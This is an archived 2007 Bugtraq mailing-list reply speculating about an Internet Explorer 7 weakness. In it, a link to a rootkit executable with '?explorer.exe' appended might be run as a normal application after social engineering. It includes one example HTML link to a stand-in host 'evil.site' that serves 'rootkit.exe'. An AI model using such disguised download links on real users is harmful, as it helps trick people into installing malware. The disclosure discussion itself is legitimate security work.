lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071015152813.1777.qmail@securityfocus.com> Date: 15 Oct 2007 15:28:13 -0000 From: jason.gerfen@...il.com To: bugtraq@...urityfocus.com Subject: Re: RE: playing for fun with <=IE7 So to root the box just some simple social engineering is needed? I mean technically speaking if someone clicks a link that downloads a rootkit for example, then appends "?explorer.exe" or equivalent wouldn't it be executed as a normal application? And if your rootkit was silent installer they are now rooted? Right? <a href="https://www.evil.site/rootkit.exe?explorer.exe">click this link</a>